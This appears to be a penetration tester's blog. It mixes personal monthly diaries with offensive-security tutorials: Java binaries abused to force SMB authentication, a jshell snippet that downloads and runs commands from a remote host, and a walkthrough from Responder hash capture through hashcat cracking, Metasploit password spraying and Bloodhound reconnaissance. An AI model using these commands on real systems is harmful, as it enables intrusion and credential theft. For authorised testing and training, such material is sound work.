Finding Missing Patches the hard way

In this post I present a short piece of PowerShell that helped me find missing patches in a .net application. The target was a thick client where source code was not provided. Almost everything has outdated dependencies and the goal for me is to see if any of them will provide an obvious way to exploit the target. Even if the dependencies are not exploitable it is great to get an insight into the development practices.

The backwards/hard way (No Source code)

The problem (for .net) can be broken into two stages:

  1. Identify the version information for all .dll files.
  2. Grunt work using Google to find the latest versions and any known vulnerabilities.

The first part was solved by the PowerShell below. Simply change the path and you get the filename and version number comma separated:

Get-ChildItem "C:\<path>\<to>\<folder>" -Filter *.dll | 
Foreach-Object {
    $version = (Get-Command $_.FullName).FileVersionInfo.FileVersion
    echo "$_,$version"
}

Then for the dirty task. Opening that output in Excel and using Google to confirm which were outdated. There is probably a short cut somewhere for this task but in the time available that did me.

What if you have the source code?

When you have source code access then your go to is to use OWASP’s Dependency-Check.

While I love Dependency-check, and feel like it is the best catch all due to the wide range of languages it supports. I have also found that it is prone to false-positives. Working with the formats it outputs is often a lot of work for me at least. It is definitely a worthy tool and I will continue to use it.

If you have access to the source then I generally get better and more actionable information using language specific tools such as:

Hope this helped you in your hour of need.

Captain’s Log: September 2021

Here is how I did in the new condensed table format.

TargetSummary
11k steps a dayI hurt my ankle in March. Working on it with stretches and am back to walking about a bit. Hit several 10k steps days in the month too.
150 active minutes per weekNowhere close. But I was closer than last month so positive.
1 technical blog a monthIt is written but waiting for the vendor patches which are in mid-October.
Support my partner to exerciseThey stopped asking for this and I now am just taking the kids on wild adventures on Saturday mornings.
Record five songsI still don’t know how to use reaper but I have found the odd hour long slots to write and record some stuff. It is all rough and cringey but I guess you don’t get anywhere without practice.

Smiles
Cowboys Have Metaphors
No Manual

There was also a Webinar that I did for work where I ended with a song. I have linked to that bit of the video at the end.
OSWEI’ll be honest I think this is a Winter time activity.
Panic AttacksSeptember was a very stressful month at times. We were ill in a loop after the kids returned to school/nursery. There were several negative covid tests and many many lost hours of sleep. As always. The panic attacks come when there is a lack of sleep. For the September weekend we got away some place. It was invigorating so I ended the month really probably the happiest I have been in a while. Hence the music getting made.

Other bits

  • Research – Vendor is releasing patches in October so I will be able to speak about this on various blogs next month. I have invested £99 in a bit of hardware just to go looking for vulns to mix up the target for the next time. That has not panned out great so far. It has actually been a pretty hard target given the limited number of features enabled and real effort being put into disabling all the androidy options that you would usually be able to flip on.
  • Work Stress – I had a very stressful time at work early in September where I put in an ungodly amount of hours over a week. I got the thing done so eventually feel good about it but living through it. But I was pretty close to burning out. I did get support from colleagues when I put my hand up so remember to work places where you can play that card and know you will get assistance.
  • Audiobooks – Still plodding on with the Shoal series. I am at Nova War. Without massive stretches of the day where I am walking about outside I am not really getting the time for this it deserves. But it is good.
  • Television 1 – Deep Space 9. Really close to the end of it. There has been noise about Netflix losing various Star Trek franchises soon. Initially that seems to just be in the US but I guess the writing is on the wall. A fair amount of Netflix’s appeal to me is because it has ST properties. So lets see.
  • Television 2 – Man Down. I finally got around to watching it all. What a great show that was. Disappointed to not get a resolution to the cliffhanger ending. It made me seriously crave more Rik Mayall energy. His part in the first series was absolutely electric.
  • Family – First weekend we did play date on the Saturday then a nice breakfast at café. This was nice because I actually met some dad’s for a change. Usually I head along to the park for the exercise. But hey there I was debating whether a 36 year old Cristiano Ronaldo would have earned his transfer fee back in shirt sales already. I think yes. Kid 1 is getting to an age where they can almost watch a game of football with me staying up late to do so having survived the Scotland vs Moldova game.
  • Family 2 – We managed a long weekend away from the house. I am dubbing this the anxiety buster. After years of cancelled or hectic and horrible holidays we managed one where I mostly relaxed. I came back more positive and more able to sign up to things.
  • Car Upgrade – Got a new car stereo fitted. Because who knew that phones would be made one day in the future without Aux cables??? Had to join the Bluetooth revolution eventually I guess.

For those who stuck to the end. Here is the outtro song from the Webinar I did:

Yes that is majorly product placement for my current employer. But that was the gig. Technically I was paid to write a song there so I am now semi-professional.

That is the log for September.

Captain’s Log: August 2021

Here is how I did in the new condensed table format.

TargetSummary
11k steps a dayI hurt my ankle in March. Working on it with stretches and am back to walking about a bit.
150 active minutes per weekNot found an exercise I can get done with my ankle like this. There is quite limited availability for swimming pools atm due to covid and my exercise bike would put pressure on the ankle. Waiting on a referral to see whats what with it. Though just at the end of the month I got back on the bike as the ankle had felt better for several days.
1 technical blog a monthIt is written but waiting for the vendor patches.
Support my partner to exerciseThey stopped asking for this and I now am just taking the kids on wild adventures on Saturday mornings.
Record five songsI played with Reaper a bit more. But no completed songs. I still don’t know how to use DAWs because I am fairly chaotic and have zero sense of timing.
OSWEI’ll be honest I think this is a Winter time activity.
Panic AttacksI have been well clear of panic attacks. Probably because I mostly got sleep when sleep was good to be got. But to clarify I feel a sense of dread literally every time I go to do something. It is exhausting to push through that sometimes but I always drive home happy and singing from every jaunt out.

Other bits

  • Research – Waiting on a vendor to patch vulns before I can toot about the next batch.
  • Audiobooks – Still plodding on with the Shoal series. I am at Nova War. Without massive stretches of the day where I am walking about outside I am not really getting the time for this it deserves. But it is good.
  • Television 1 – Deep Space 9. This is probably the 3rd time I have started watching it through. This time I am seeing it through the lens of racism. The whole show seems to be about hating the Cardassians at the start. Even from Miles who is supposed to be an enlightened Human member of Star Fleet.
  • Family – Still working on fun for family, fun for me and my partner, and fun for me. Not doing too badly at it. We have been out and about more for food. To a few museums. It has been pleasant. We even made it to a swimming pool in Glasgow for the first time this year. It has been impossible to book slots all summer. When they stopped taking bookings we rocked up at 9am to be told there was an hour to wait and we were entirely unprepared for that. So it was a victory to finally get into a pool.
  • Family 2 – With the return to school we have gained a less stressful work-life balance (aside from odd drop off and pickup times). My partner (and primary child herder) has enjoyed a few weeks of afternoons free of childcare and has thoroughly and deservedly chilled out. The much delayed thinking about returning to work is now back on the cards. It is rarely spoken about how childcare can be monotonous and unrewarding for some people. But because of love, and covid, they have stuck ably to the task for years beyond the age nurseries would take the kids. Not to be a martyr, but because we believed it was right to do it this way for us. That has come at a cost to our mental health at times. The last time there was light at the end of this tunnel lockdowns started and punched that back down hard for over a year. Living a life waiting for time to tick is exceptionally hard.
  • Pentesting – I found a target with “.svn” folders and used svn-extractor to get the win.
  • Housey stuff – Most weekends this August we do about an hour of tidying up as a family and get the place pretty decent. Many hands make light work and all that! That is what this months featured image is about. The fact we were tidying stuff regularly. As a result I was also able to do some of the DIY tasks and get things variously recycled, gifted, or out of my life for ever as appropriate. My home office has had a re-orientation and I am considering getting a second desk for “hobbies”. We have also paid for a new floor for the kitchen and are waiting on an installation date. It will be great to finally be able to mop a surface. I could rant for hours about how this house has broken flooring everywhere but I won’t.

That is the log for August.

Java giving more shells on everything

Back in 2018 I blogged about how java gives a shell for everything, and also how to compile in memory as an AV Evasion technique. Some of these techniques have now been added into gtfo bins, and heroes even integrated them into metasploit.

In this post I go through the most recent JDK/JRE and look for new features Pentesters may find useful. Apologies for this reading a bit like a shotgun blast of information. But this is essentially the notes I took as I poked around in the order I did it. I am personally most interested in the last part with “jshell” if you want to see just one part then go there.

First what about different Versions of Java?

There are two major versions of Java:

  • Java Runtime Environment (JRE) – Which is used on machines that only need to execute Java code. The binary “java” is used to execute code.
  • Java Development Environment (JDK) – Which is needed on developer machines. The “javac” command is used to compile “.java” files into “.class” files which can then be executed.

If you have landed on a laptop or workstation the chances are only the JRE is installed unless the user is a developer. If you land on a server which hosts a website powered by Java you probably have the JDK installed. There are far more binary commands bundled in the JDK than the JRE so there is more scope for naughtiness with the JDK.

Comparison of Binaries Available in JRE/JDK

I downloaded the most recent Windows JRE and JDK and compared the list of executables in the “/bin” folder. The raw data is in this spreadsheet. The short version is that these are the binaries which are shared between the JRE and JDK:

Shared
jabswitch
java
javaw
keytool
kinit
klist
ktab
rmid
rmiregistry
List of commands shared by JRE and JDK

If you find something that works in these binaries then you should congratulate yourself for finding a universal Java technique.

Other points of note from the spreadsheet:

  • jjs.exe exists in the latest JRE meaning our JavaScript payload techniques are still in play there.
  • jrunscript.exe exists in the latest JDK. However, there appeared to be no Nashorn included.

I can confirm that Nashorn worked in “jjs.exe” for the most recent JRE:

Hello from Nashorn in JRE

And that it did not work out of the box for “jrunscript.exe” in the most recent JDK:

No Nashorn for you.

While the binary exists it has been neutered unless Nashorn has been added separately.

An easier command prompt via JJS

Last time I gave JavaScript commands that you could type into a JJS prompt which would give you a reasonably interactive command prompt. The reason for doing this is to get a functional command prompt in an environment where maybe powershell.exe, cmd.exe, and ftp.exe etc are all blocked. In that universe “jjs.exe” worked no problem. I mean where exclude lists are used instead of allow lists for running binaries.

This time I properly RTFM and spotted this nugget:

The JJS Manual

If you run “jjs” with “-scripting=true” then it will give you access to the “$EXEC()” function. This can be used to execute local commands within JJS without needing to type in any JavaScript:

Using $EXEC

A minor improvement depending on how you want to look at it. It is a little inconvenient typing “$EXEC()” every time. So you can save a few keystrokes with a simple function that shortens it:

using “a” function to alias $EXEC()

But then I got intrigued by what other binaries were hanging around in a modern JDK install. So I looked into the contents of the “bin” folder again.

Ahead of Time Compilation with jaotc

I spotted a new binary called “jaotc” which has a useful tutorial here. Jaotc is summarised as:

“The Java static compiler that produces native code for compiled Java methods”

Ears of hackers must have pricked up there. Did you say “native code”? Can confirm it did. It aims to make faster Java apps by allowing you to convert a class to native code.

It will compile a class file into a “.so” library. Lets assume you have a reverse shell in “rev.java” your work flow is like this:

javac rev.java
jaotc --output rev.so rev.class

Line 1 compiles it into normal Java Bytecode.
Line 2 converts that to a native library.

If you run the file command it is now an ELF binary:

file rev.so
rev.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped

Who knows what transforms have just gone on to make that magic work. The transforms might be useful for hiding payloads. I am not a reverse engineer by any stretch of the term so I have probably not grasped the hacking potential of this.

To run your library via Java you need to do this:

java -XX:+UnlockExperimentalVMOptions -XX:AOTLibrary=./rev.so

Note: at the moment this is an experimental option so you need the “UnlockExperimentalVMOptions” argument.

It will work on Linux and on Windows Linux Subsystem. There is no support for compiling “.dll” files so this is going to be a niche choice, and I am not entirely sure how to use it for nefarious purposes today. A pin in that for later maybe.

Triggering DNS/Getting NTLM Hashes

JDK/JRE binaries allow input files within their command line arguments. These accept UNC paths so can be used to trigger DNS resolution. If you are on the same network (or the Firewall is crazy and allows SMB outbound) then you can use responder to capture NTLM hashes:

Capturing hashes landing in Responder Logs

Note: I have a recent post which includes a bit on how to crack these hashes.

JDK/JRE binaries have a myriad of options which handle file paths. I stopped looking when I found one way to do it per binary or I had spent longer than 5 minutes looking. Therefore this is not exhaustive and there will be more:

jar -v -t --file=\\192.168.45.129\test
jarsigner-verify \\192.168.45.129\test
java \\192.168.45.129\test
javac \\192.168.45.129\test
javadoc \\192.168.45.129\test
javap \\192.168.45.129\test
jcmd 1 -f \\192.168.45.129\test
jdeprscan.exe \\192.168.45.129\test
jdeps \\192.168.45.129\test
jfr metadata \\192.168.45.129\test
jhsdb clhsdb --core \\192.168.45.129\test --exe test.exe # Do not use this
jimage info \\192.168.45.129\test
jlink --module-path \\192.168.45.129\test
jmap -histo:live,file=\\192.168.45.129\test <pid> # Requires PID for valid Java Process
jmod list \\192.168.45.129\test
jpackage --input \\192.168.45.129\test --main-jar test
jrunscript.exe -cp \\192.168.45.129\test
jshell \\192.168.45.129\test
kinit -c \\192.168.45.129\test
klist -c -f FILE:\\192.168.45.129\test
ktab -k FILE:\\192.168.45.129\test
rmid -log \\192.168.45.129\test

Note: the “jhsdb” command opens its own command prompt interface which would remain open if you had a victim open it. While it did result in an SMB handshake I would not advise using this.

In addition to those above, I found an almost universal way to trigger an SMB interaction. Most binaries would run a JVM when they execute, which makes sense because they are made in Java. The JVM supports various options. The “Xloggc” option (or the incoming “-Xlog:gc” syntax) can specify the location for a log file whenever the JVM does garbage collection. It accepts UNC paths.

The beautiful thing is that this triggers an SMB connection as the JVM loads meaning that you do not need to supply valid command line arguments to the binary you are launching. This saves a lot of effort reading “–help”.

The following is a list of examples that worked for the most recent JDK binaries:

jaccessinspector.exe -J-Xloggc:\\192.168.45.129\test
jarsigner.exe -J-Xloggc:\\192.168.45.129\test
javadoc -J-Xloggc:\\192.168.45.129\test
javap -J-Xloggc:\\192.168.45.129\test
javaw -Xloggc:\\192.168.45.129\test # This causes a GUI popup error
jcmd -J-Xloggc:\\192.168.45.129\test
jconsole -J-Xloggc:\\192.168.45.129\test # This causes a GUI popup error
jdb -J-Xloggc:\\192.168.45.129\test
jdeprscan -J-Xloggc:\\192.168.45.129\test
jdeps -J-Xloggc:\\192.168.45.129\test
jfr -J-Xloggc:\\192.168.45.129\test
jhsdb -J-Xloggc:\\192.168.45.129\test
jimage -J-Xloggc:\\192.168.45.129\test
jinfo -J-Xloggc:\\192.168.45.129\test
jlink -J-Xloggc:\\192.168.45.129\test
jmap -J-Xloggc:\\192.168.45.129\test
jmod -J-Xloggc:\\192.168.45.129\test
jpackage -J-Xloggc:\\192.168.45.129\test
jps -J-Xloggc:\\192.168.45.129\test
jrunscript -J-Xloggc:\\192.168.45.129\test
jshell -J-Xloggc:\\192.168.45.129\test              
jstack -J-Xloggc:\\192.168.45.129\test     
jstat -J-Xloggc:\\192.168.45.129\test              
jstatd -J-Xloggc:\\192.168.45.129\test      
keytool -list -J-Xloggc:\\192.168.45.129\test
kinit -J-Xloggc:\\192.168.45.129\test
klist -J-Xloggc:\\192.168.45.129\test              
ktab -J-Xloggc:\\192.168.45.129\test             
rmid.exe  -J-Xloggc:\\192.168.45.129\test
rmiregistry -J-Xloggc:\\192.168.45.129\test
serialver -J-Xloggc:\\192.168.45.129\test

Pretty much every binary in the JDK supported this approach!

As the “java” command runs the JVM directly there is a no need for the “-J-” part so this is the syntax for doing the same there:

java -Xloggc:\\192.168.45.129\test

When a binary existed in both the JDK and JRE there were subtle differences. For example, the JDK version of “javaw” required the “-J-” syntax, while the JRE version worked using “-Xloggc” directly.

As always experiment on your own computer before attempting the technique on a victim’s PC. That nugget of advice is pure gold and will save you thousands of wasted hours.

jshell is my new favourite thing

This command was new to me and its name immediately stood out as potentially useful. This makes Java an interpreted language!!! You can write whatever Java you want and it executes it exactly the same way as using the Python interpreter for example:

InputStream inputStream = new URL("http://192.168.45.129/test").openStream();
String cmd = new BufferedReader(new InputStreamReader(inputStream)).lines().collect(Collectors.joining("\n"));
Process proc = Runtime.getRuntime().exec(cmd);
String result = new BufferedReader(new InputStreamReader(proc.getInputStream())).lines().collect(Collectors.joining("\n"));

The above will download a file over HTTP and save the contents of the file into the “cmd” String. It will then run that command and save the output to the “result” string. The screenshot below shows this operating:

Using jshell

I saved the command “whoami” in the “test” file which was then served using a python HTTP listener like this:

python -m SimpleHTTPServer 80

You can see that above in the line saying cmd ==> “whoami”.

Additionally, you can store Java commands in a .jsh file and then have them execute as shown:

jshell whatever.jsh

If you save the above example into “whatever.jsh” it will run the commands blindly and you won’t see what was run. If you type “result” though the output from the command will be there. This puts your payload on Disk where it is more likely to be gobbled by AV.

There is a nice tutorial for jshell here. To me this has the same impact as “jrunscript” and “jjs” did before for Nashorn. Only now you are writing payloads in Java instead of JavaScript.

This thing is gorgeous and I love it because it is another scripting language essentially and one which may be a blind spot.

Captain’s Log: July 2021

Here is how I did in the new condensed table format.

TargetSummary
11k steps a dayI hurt my ankle in March. I have basically given myself a free pass and seen my health decline as a result. Now I am back to doing more exercise. Mixing YouTube videos with the kids and other activity. I have seen my steps back up to around the 10k a day mark. This is progress but it is slow. Then right at the end of the month my ankle has started hurting again. Time to get a GP involved.
150 active minutes per weekStart of July was a nightmare in terms of hay fever. I figure better cardio health is probably a good tool for bad days. So I have resolved to increase this again. Now the battle is getting what fitbit determines to be “Active Zone” minutes. Several times I have been out murdering parts of the garden dripping with sweat only to find that hour didn’t count. Logically I was definitely working hard. Not sure how to be measuring this now.
1 technical blog a monthI have failed to achieve this.
Support my partner to exerciseThey stopped asking for this and I now am just taking the kids on wild adventures in and around the house for Saturday mornings.
Record five songsI did not make anything ready to release. I have acquired a new DAW (Reaper) but have not had time to go through any tutorials for it. This is in the wake of Audacity going to the dogs and because I never quite got along with Ableton Live Lite which I have used before. I have done a lot of playing guitar in the garden but have not recorded anything.
OSWEI’ll be honest I think this is a Winter time activity.
Panic AttacksI had the start of a panic attack after gardening and probably reacting badly to all of the pollen. When you cannot breathe that is a good time to start a panic in my opinion. I got over it pretty quickly.

We went to Edinburgh for a weekend and the start of the drive definitely had me feeling the panic rising. This is possibly because I have not been further than 3 miles all pandemic. The hotel was worryingly about 5 degrees C hotter inside than outside in a heat wave. I have sensitivity around being too hot and if I cannot cool down then I am not really able to relax. Eventually we did what we had booked before we arrived and then checked out as soon as possible and went home. The thought of a second night not sleeping in the furnace of a room was not great.

Other bits

  • Research – Having cleared the Fedena stuff I finally went hunting for more CVEs. As part of a team at work we have found 10 new CVE worthy vulnerabilities in another bit of Open Source software. The vendor has been responsive (result!) and hopefully I can turn this around in way less than 12 months to disclosure like Fedena was. There is scope for a blog and a talk at DC44141 for September IF they can get the patches out in time.
  • Euro 2020 – What an amazing tournament this was. I really enjoyed it. Scotland’s cameo showed we needed a striker but that is life. Our players have experience now so lets go for more qualifications.
  • Audiobooks 1 – as I have picked up the exercise and steps again I have finally completed Stealing Light: Shoal, Book 1 by Gary Gibson. This was really entertaining and had some nice ideas in there. I am now a couple of hours into the second book in the series.
  • Television 1 – Deep Space 9. This is probably the 3rd time I have started watching it through. This time I am seeing it through the lens of racism. The whole show seems to be about hating the Cardassians at the start. Even from Miles who is supposed to be an enlightened Human member of Star Fleet.
  • Movies – We watched Parasite. It was a fun couple of evenings (because parents can rarely watch a film in one sitting).
  • Family – I have made an effort to ensure each day has fun for me, fun for me and the kids, and fun for me and my partner. I think the pandemic really had done a number on my happiness. This seems to be the way to go. We went on a trip to Edinburgh (the first time I have gone more than 3 miles since lockdown 1). This was largely a success.
  • Outside 1 – We travelled more than 3 miles for the first time since lockdown 1. We went to Edinburgh to see the Ray Harryhausen exhibit. I thoroughly recommend it if you have enjoyed any of his movies growing up. It has many models that made me go *squee*. Highlight of the trip for the kids was a go in a swimming pool at the hotel. This was a great weekend because I didn’t have a major freak out and this is progress. It gets easier as the kids get bigger.
  • Outside 2 – Last weekend of July we went to the Glasgow Science Centre. This is always a joyous experience and you should also give that a go. The soft play part on the middle floor is closed (probably because Covid would make that a nightmare to police). There is still oodles to see and do. We gave the cafe a go and rate it pretty highly.

That is the log for July.

Captain’s Log: June 2021

Here is how I did in the new condensed table format.

TargetSummary
11k steps a dayI hurt my ankle in March. I am out of this game for the foreseeable.
150 active minutes per weekI am not getting “active” minutes (on the FitBit scale) on the exercise bike to the same degree I was from jogging. But I am doing 20 minutes at least 3 times a week. I am going out for walks with the kids and gardening at the weekends. None of this is seemingly counting on the FitBit scale.
I am working on getting back to activity it feels closer.
1 technical blog a monthSuccess. I documented the basics of attacking an internal network using Responder, Hashcat, Metasploit, Bloodhound and CrackMapExec. Giddy thrill of apparently this being shared by threat actors enough to wind up in threat intelligence feeds. Which is bemusing for entry level tooling and techniques that have been around for years.
Support my partner to exerciseThey stopped asking for this and I now am just taking the kids on wild adventures in and around the house for Saturday mornings. Counting down the days until I get vaccinated and feel willing to goto visitor attractions again like the world class museums in Glasgow.
Record five songsI have recorded heaps of short ideas. Mostly on the guitar sat out in the sunshine. Some of them I can see me converting into 2-3 minute items.
OSWEI’ll be honest I think this is a Winter time activity.
Panic AttacksI have avoided them again this month.

Other bits

  • Research – I was not able to talk about this last month but the Fedena research finally came out. My team and I found seven vulnerabilities in this school management software. It took over a year from discovery to posting. This was picked up by the daily swig, which was nice! Getting clear of this has given me a boost to go find some more bugs. The technical details for the authentication bypass CVE-2021-27980 are out for reading. Or just the short video of the PoC:

  • Euro 2020 – I cannot adequately put into words how excited I was for this. I barely watch football these days but I just love these tournaments. The fact that Scotland were at the party just made it all the more exciting. The build up to the first game was fantastic and I was singing through the entire game. It doesn’t matter that Scotland exited early. We actually played pretty well. I would say that was pretty much the tale for our tournament in the end. We played well. We created chances. But we couldn’t take them and that was the end of that.
  • Audiobooks 1 – technically still on Stealing Light: Shoal, Book 1 by Gary Gibson. A good bit of Sci-Fi. But without much exercise or walking occurring these days my time has been limited.
  • Television 1 – Star Trek Voyager. I have completed this and it honestly stands up quite well. Last time I watched it there were far more episodes I wanted to skip. This time I was ok with most of it. Some excellent Star Trek in here.
  • Television 2 – Brooklyn 99. After voyager I fell back into season 7 of this. What a lovingly made show this is. Captain Raymond Holt going badass over his fluffy boy being kidnapped is a total highlight.
  • House – We booked someone to come replace the bathroom sink and they have not done so yet. We have sort of been stuck waiting on that as we are trying to do things in a set order.
  • Garden – Has paid out strawberries twice already this summer. I have had horrific hay fever (the worst I have ever had) but I have still been able to murder the lawn appropriately so hopefully I will learn to get that done more effectively to minimise the impact. I have been out the back in a Darth Vader style breathing mask but that didn’t actually reduce the symptoms after cutting the grass. Answers on a post card (or comment) welcome.

That is the log for June.

Grabbing NTLM hashes with Responder then what?

Local networks have lots of things on them that we as penetration testers can exploit. In a Windows environment there are often protocols (LLMNR and NBT-NS) which can be easily exploitable. Effectively you are running a man in the middle attack and using that to intercept traffic being sent by users in order to capture their hashed password.

To do this you need to be in control of a machine in the LAN which for us usually means our laptop, or a VM if the customer is enabling remote testing via a VPN.

Running Responder

For years the tool of choice has been Responder.

If you are doing this on a remote server rather than your laptop then you should first launch “tmux”. I have blogged about persistent SSH sessions before. The super tl;dr version is this:

tmux new -s <session name>
tmux new -s responder

If you get disconnected you will need to re-establish your SSH connection. Then you can reattach:

tmux attach -t <session name>
tmux attach -t responder

It is worth your energy to learn more about tmux:

As for running responder it is as simple as this:

responder -I <interface>
responder -I eth0

It is capable of many more things such as prompting users with fake prompts to obtain plaintext passwords. In this default configuration it will find LLMNR and NBT-NS traffic. It will respond on behalf of the servers the victim is looking for and capture their NTLM hashes.

These hashes have to be cracked using brute-force before they can be used. This is in contrast to any passwords you may pull out of the registry for local Windows accounts where you can use pass the hash.

Responder Log Files

As responder runs it saves detailed logs in this folder:

/usr/share/responder/logs

For each captured hash there will be a file like “SMB-NTLMv2-SSP-<ip>.txt”. This will contain hashes intended for that host. There will be repeated hashes for the same account because you will have likely captured the same user multiple times.

For completeness you may want to try cracking every different hash because what if the victim had typed their credentials incorrectly? In practice when you have hundreds of unique user hashes the risk of that is pretty minimal. If you want to crack all the things take all of these “SMB-NTLMv2-SSP-<ip>.txt” files and run them through hashcat (shown later).

When I have hundreds of hashes, the file I work with is “Responder-Session.log”. This is equivalent to what the tool spits out to the terminal as it captures things. To use this I use a bash loop to extract the first hash for each username.

Bash Loop To Extract Unique Hashes

First we need to list the unique usernames we have captured:

strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'

Some points about this:

  • The sort command “-u” (unique) “-f” (case insensitive) .
  • Cut is wonderful at splitting a line in output which has delimiters in it allowing you to select specific columns from the results. Using “-f 4-6” we say our username is also at a specific domain i.e. “cornerpirate::DOMAIN”. This means if the same username exists across domains then you are going to include them.
  • The awk command removes the first character and without it your usernames would have one white space before them.

For each username we need to obtain the first NTLMv2 hash and save it into a file:

for user in `strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'`
do
echo "[*] search for: $user";
strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 |  head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt
done

The results are saved into “ntlm-hashes.txt”. Note that it uses “>>” to redirect into that file. This means that if you run this loop again you will see duplicate hashes being added. So remember to delete the file before running the loop again.

Apart from that the only difference is the cut command is getting all columns “4-10” instead of just 4 which is the username, and the use of “head -n 1” to just get the first occurrence of that users hash.

I have added the “echo” command so that you are certain it is doing its job. Otherwise this loop can take some time and you might get concerned.

For most intents and purposes this for loop will get you enough hashes to go attack.

Hashcat command to crack NTLMv2 Hashes

On an x64 Windows system your command is this:

hashcat64.exe -m 5600 <hashes file> <wordlist> -o <output file>
hashcat64.exe -m 5600 ntlm-hashes.txt Rocktastic12a -o cracked.txt

The “Rocktastic12a” is available for download from Nettitude. At around 13GB this is a reasonable wordlist that doesn’t go overboard at eating disk space. It is useful for most situations.

When hashes get cracked they will be saved in the output file (cracked.txt) where you can extract them for use.

Spraying Cracked Passwords using Metasploit

Metasploit includes the “smb_login” module which is usually used for password brute force attacks. It also has a “USERPASS_FILE” option as described below:

When making login attempts we need to also set the “SMBDomain” value appropriately. Before we get ahead of ourselves we need to determine how many domains we have credentials for:

cat cracked.txt | cut -d ":" -f 3 | sort -u -f

This will spit out an alphabetised list of domains that you have cracked hashes for. You will need to create one “USERPASS_FILE” for each domain. The following loop will do what you need:

for domain in `cat cracked.txt | cut -d ":" -f 3 | sort -u -f`
do 
grep -i $domain cracked.txt| cut --output-delimiter=' ' -d ":" -f 1,7 >> userpass_$domain.txt
done

The output will be stored in one or more txt files called “userpass_*.txt”.

For each target domain you now do this as the options into “smb_login”:

set SMBDomain <DOMAINNAME>
set USERPASS_FILE /path/to/userpass_domain.txt

Before hitting “exploit” you are going to need to tell Metasploit which hosts to log into using the “RHOSTS” option. As I am assuming you are on a legitimate penetration test you can be noisy on the network. You would NOT be doing this kind of thing on a red team engagement where you are being tasked with avoiding detection.

The “major yolo” is to spam these creds at literally every host that speaks SMB on TCP port 445. A single IP suddenly logging in across the network with multiple accounts would be like setting off a bunch of fireworks for the Blue Team to see. This is why you would only do this on a Pentest and not where you needed to be subtle.

The “minor yolo” is to look into the responder logs folder and extract the IP addresses people were logging onto. These systems give you a high degree of certainty that the credentials are valid ahead of time.

However you do it, set your “RHOSTS” appropriately and then type “exploit”. This will tell you a list of credentials that were valid. It will also populate Metasploits database of compromised credentials which you can access via the “creds” command. You should definitely get comfortable using creds because it is a massive bonus having a queryable list of known valid credentials during an engagement.

Now what?

To recap we have gone from the perspective of an attacker on the LAN without any knowledge or passwords to a point where we have found valid domain credentials.

If you are lucky then some of the compromised credentials will already have elevated privileges and then you are pretty much done. Recently I had 250 ish compromised accounts but every single one of them only was only in the “Domain User” group. So the rest is assuming we have only those permissions what can we do?

Domain Reconnaissance with Bloodhound

Bloodhound is fantastic. When you have access to a domain account you can gather data from your machine using this python script:

python3 bloodhound.py -d <DOMAIN> -u <USERNAME> -p <PASSWORD> -gc <DOMAIN_CONTROLLER_ADDRESS> -c all

If you an interactive shell on a machine already then you can also use various other “ingestor” scripts.

This will create a bunch of .json files in the current working directory. There are plenty of blogs out there describing how install the Bloodhound user interface. However, many of those are outdated in 2021 because it was previously more difficult. There is now an apt package so using Docker is no longer the simplest route (however using a container is ephemeral which may be useful to you if you need to avoid caching customer data).

Install neo4j:

apt-get install neo4j

Then run that using this:

neo4j console

Follow the instructions spat out to the terminal. This will require you to use a web browser to setup a database with a username and password. You will need to know these credentials so that bloodhound can use neo4j later.

Next install bloodhound:

apt-get install bloodhound

So long as neo4j is running all you need to do is run your new command “bloodhound” at the terminal and enter your neo4j credentials and you are away!

Import those json files and then explore the UI to discover juicy information about the domain. You can use this to confirm how many users are in the “Domain Admins” group, what machines they are logged into, and loads more things.

Inspect SMB Shares

CrackMapExec is an amazing tool. This lets you specify a set of credentials and then blast through an entire network to determine what SMB shares they can access. It is often the case that insecure file permissions exist on these shares.

Prioritise exploring any share where you have write access. If that share has executables (.msi, .exe, .bat, .ps1 etc) then you have a chance to modify them. Doing so will give you an easy privilege escalation vector since the victim would execute the code you have supplied. Warning: do not do this without your customer’s permission.

If you have read access to any configuration files then go hunting for plain-text credentials. These will obviously give you lateral movement opportunities. It is common to gain access to databases using this technique.

If you have access to documents then go looking for juicy content. If there is an excel file that is heavily accessed then consider using dynamic data exchange (DDE) to execute commands on the PC’s of other users. Warning: this will prompt victims with security warnings before code executes, again do this with customer permission.

The documentation for CrackMapExec is fantastic. You can use it to do wonderful things so I recommend it with all my heart.

Then what?

I had to stop the journey somewhere. That is basically now. You should have gained access to significant resources by this point. You need to keep detailed notes as you did this so that you know exactly how you obtained which permissions or levels of access. The customer is going to thank you if the report is super clear about what you accessed and how you got there.

I make an appendix in my report called “Route to Domain Admin” where I start from the initial point and then as I progress through the levels of privilege I explain how. There may be several ways to do a certain step so you need to document them too.

Happy hunting.

Captain’s Log: May 2021

Here is how I did in the new condensed table format.

TargetSummary
11k steps a dayI hurt my ankle in March. I am out of this game for the foreseeable.
150 active minutes per weekWeek 1 – No.
Week 2 – No.
Week 3 – No.
Week 4 – No.

I am not getting “active” minutes (on the FitBit scale) on the exercise bike to the same degree I was from jogging. But I am doing 20 minutes at least 3 times a week. I am going out for walks with the kids and gardening at the weekends. None of this is seemingly counting on the FitBit scale.
1 technical blog a monthA cheeky wee post about XSS. Nothing too fancy. But highlighting that the techniques I blogged about a while back still pay out.
Support my partner to exerciseThey stopped asking for this and I now am just taking the kids on wild adventures in and around the house for Saturday mornings. Counting down the days until I get vaccinated and feel willing to goto visitor attractions again like the Transport Museum.
Record five songsI recorded a song for the Euro2020 campaign called Singing and Swinging. I knocked out a cheap video over the bank holiday weekend so that it can be shared on YouTube. The video is under the table.
OSWEI’ll be honest I think this is a Winter time activity.
Panic AttacksI didn’t get to full blown panic attack. But I did medically need sleep one day at the end of May. Kids were just popping up at random times of the night. I also did rather a lot of things in the evenings into the wee hours too many nights on the bounce. It settled down after I finally got some sleep.

Singing and Swinging

Other bits

  • Audiobooks 1 – carrying on with Stealing Light: Shoal, Book 1 by Gary Gibson. A good bit of Sci-Fi. With the school commute removed, and me no longer grinding out 11k steps a day otherwise I have barely touched the audiobooks. I should rethink my life!
  • Television 1 – Star Trek Voyager. I have not rewatched this in ages so it was a natural thing to give another go. I like it and think the performance of the Dr in particular stands out.
